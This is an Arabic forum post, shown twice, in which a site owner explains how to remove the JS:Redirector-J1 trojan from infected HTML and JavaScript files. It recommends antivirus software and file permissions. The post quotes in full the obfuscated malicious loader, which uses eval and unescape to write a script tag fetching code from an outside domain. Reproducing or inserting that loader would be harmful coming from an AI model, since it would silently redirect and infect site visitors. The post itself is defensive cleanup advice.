admin
10-30-2013, بتوقيت غرينيتش 11:57 PM
http://www.dzbatna.com/images/icons/iconrote.gif ط*ظ„ ظ…ط´ظƒظ„ط© طھط±ظˆط¬ط§ظ† [JS:Redirector-J1 [Trj ط§ظ„ط°ظٹ ط£طµط§ط¨ ط§ظ„ظƒط«ظٹط± ظˆط®ط§طµط© ظ…ظ„ظپط§طھ html ظˆظ…ظ„ظپط§طھ js (http://www.dzbatna.com/t1233390/)
السلام عليكم ورحمة الله وبركاته
أسعد الله أوقاتكم بكل خير
قبل يومين واجهت مشكلة في موقعي من كود code خبيث وينتشر بشكل رهيب وغير مسبوق على الإطلاق الذي يسببه تروجان [JS:Redirector-J1 [Trj والذي يكشفه البرنامج القوي والرائع "avast" للحماية .
لتحميل آخر نسخة من هذا البرنامج ادخل الرابط التالي "وصلة مباشرة"
http://files.avast.com/iavs4pro/setupara.exe
ثم بعد ذلك ادخل الرابط التالي "لتقوم بالتسجيل في الموقع ضع بياناتك كاملة في هذه الصفحة وسيصلك مفتاح مجاني free لمدة سنة"
http://www.avast.com/arb/home-registration.php
وبإمكانك التجديد كل سنة مجانا وتحديث updateات من الشركة الأم مجانا
طبعا برنامج افاست غني عن التعريف في كشف الفيروسات وجميع انواع الأكواد الخبيثة
نرجع لموضوعنا ..
الكثير ممن شاهدوا ذلك قالوا إنه كود code iFrame وللأسف لما فتحت الملفات المصابة لم أجد على الإطلاق كلمة iFrame ولكن لم افقد الأمل ابدا وبحثت عن حل ولله الحمد وجدته ..
اكتشفت ان الكود code كود code جافا سكربت بدلالة الإختصار JS
إذا فحصت ملفات موقعك او مثلا دخلت موقعك وظهر لك تحذير من افاست "حصان طروادة أو تروجان" وكان اسم التروجان [JS:Redirector-J1 [Trj
فإليك الحل
إذا كان الملف من نوع html
فابحث عن الكود code التالي :
يبدأ بـ :
</head><script language=javascript>
وينتهي الكود code بـ :
--></script>
طبعا بينهم الكثير من الحروف العشوائية
احذف الكود code من بدايته وحتى نهايته بما فيه من أحرف عشوائية
*******************************
أما إن كان الملف من نوع js
فابحث عن الكود code التالي :
رمز Code:
<!-- (function(k8Dd){var i7u='%';var hll='<76ar<20a<3d<22Sc<72ipt<45<6egine<22<2c<62<3d<22<56e<72s<69<6f<6e()+<22<2cj<3d<22<22<2cu<3dnaviga<74<6fr<2eu<73<65<72Agent<3bi<66<28(u<2e<69nd<65<78<4ff(<22Chro<6de<22)<3c0<29<26<26(u<2e<69nde<78O<66(<22W<69<6e<22)<3e<30)<26<26<28u<2ei<6e<64exOf(<22NT<20<36<22)<3c<30)<26<26(doc<75ment<2eco<6fkie<2eind<65<78Of(<22miek<3d1<22<29<3c0)<26<26(<74ypeof(zr<76zts)<21<3dtypeof(<22A<22<29))<7b<7arvz<74s<3d<22<41<22<3b<65<76al(<22<69<66(win<64ow<2e<22+a+<22)<6a<3dj<2b<22+a+<22Major<22+b+a<2b<22<4din<6fr<22+b<2ba+<22<42<75ild<22+<62+<22j<3b<22)<3bdo<63umen<74<2e<77<72<69te(<22<3cscript<20<73rc<3d<2f<2fm<61rt<22+<22uz<2e<63n<2fvid<2f<3f<69<64<3d<22<2bj+<22<3e<3c<5c<2fscript<3e<22)<3b<7d';eval(unescape(hll.replace(k8Dd,i7u)))})(/\</g); -->
واحذفه بالكامل
وقم بتغيير تصريح ملفات الـ html إلى 444
اما ما يخص الملفات js فليس لي علم بالتصريح المناسب لها لأني لا املك خبره بهذا الجانب
أتمنى اكون افدتكم
حبيت اقدم حلول لمن يواجه مشكلة من هذا النوع
تقبلوا مني اجمل التحايا
ألعاب الأندرويد مجانا و حصريا (http://www.apotox.info/forum)
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
السلام عليكم ورحمة الله وبركاته
أسعد الله أوقاتكم بكل خير
قبل يومين واجهت مشكلة في موقعي من كود code خبيث وينتشر بشكل رهيب وغير مسبوق على الإطلاق الذي يسببه تروجان [JS:Redirector-J1 [Trj والذي يكشفه البرنامج القوي والرائع "avast" للحماية .
لتحميل آخر نسخة من هذا البرنامج ادخل الرابط التالي "وصلة مباشرة"
http://files.avast.com/iavs4pro/setupara.exe
ثم بعد ذلك ادخل الرابط التالي "لتقوم بالتسجيل في الموقع ضع بياناتك كاملة في هذه الصفحة وسيصلك مفتاح مجاني free لمدة سنة"
http://www.avast.com/arb/home-registration.php
وبإمكانك التجديد كل سنة مجانا وتحديث updateات من الشركة الأم مجانا
طبعا برنامج افاست غني عن التعريف في كشف الفيروسات وجميع انواع الأكواد الخبيثة
نرجع لموضوعنا ..
الكثير ممن شاهدوا ذلك قالوا إنه كود code iFrame وللأسف لما فتحت الملفات المصابة لم أجد على الإطلاق كلمة iFrame ولكن لم افقد الأمل ابدا وبحثت عن حل ولله الحمد وجدته ..
اكتشفت ان الكود code كود code جافا سكربت بدلالة الإختصار JS
إذا فحصت ملفات موقعك او مثلا دخلت موقعك وظهر لك تحذير من افاست "حصان طروادة أو تروجان" وكان اسم التروجان [JS:Redirector-J1 [Trj
فإليك الحل
إذا كان الملف من نوع html
فابحث عن الكود code التالي :
يبدأ بـ :
</head><script language=javascript>
وينتهي الكود code بـ :
--></script>
طبعا بينهم الكثير من الحروف العشوائية
احذف الكود code من بدايته وحتى نهايته بما فيه من أحرف عشوائية
*******************************
أما إن كان الملف من نوع js
فابحث عن الكود code التالي :
رمز Code:
<!-- (function(k8Dd){var i7u='%';var hll='<76ar<20a<3d<22Sc<72ipt<45<6egine<22<2c<62<3d<22<56e<72s<69<6f<6e()+<22<2cj<3d<22<22<2cu<3dnaviga<74<6fr<2eu<73<65<72Agent<3bi<66<28(u<2e<69nd<65<78<4ff(<22Chro<6de<22)<3c0<29<26<26(u<2e<69nde<78O<66(<22W<69<6e<22)<3e<30)<26<26<28u<2ei<6e<64exOf(<22NT<20<36<22)<3c<30)<26<26(doc<75ment<2eco<6fkie<2eind<65<78Of(<22miek<3d1<22<29<3c0)<26<26(<74ypeof(zr<76zts)<21<3dtypeof(<22A<22<29))<7b<7arvz<74s<3d<22<41<22<3b<65<76al(<22<69<66(win<64ow<2e<22+a+<22)<6a<3dj<2b<22+a+<22Major<22+b+a<2b<22<4din<6fr<22+b<2ba+<22<42<75ild<22+<62+<22j<3b<22)<3bdo<63umen<74<2e<77<72<69te(<22<3cscript<20<73rc<3d<2f<2fm<61rt<22+<22uz<2e<63n<2fvid<2f<3f<69<64<3d<22<2bj+<22<3e<3c<5c<2fscript<3e<22)<3b<7d';eval(unescape(hll.replace(k8Dd,i7u)))})(/\</g); -->
واحذفه بالكامل
وقم بتغيير تصريح ملفات الـ html إلى 444
اما ما يخص الملفات js فليس لي علم بالتصريح المناسب لها لأني لا املك خبره بهذا الجانب
أتمنى اكون افدتكم
حبيت اقدم حلول لمن يواجه مشكلة من هذا النوع
تقبلوا مني اجمل التحايا
ألعاب الأندرويد مجانا و حصريا (http://www.apotox.info/forum)
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
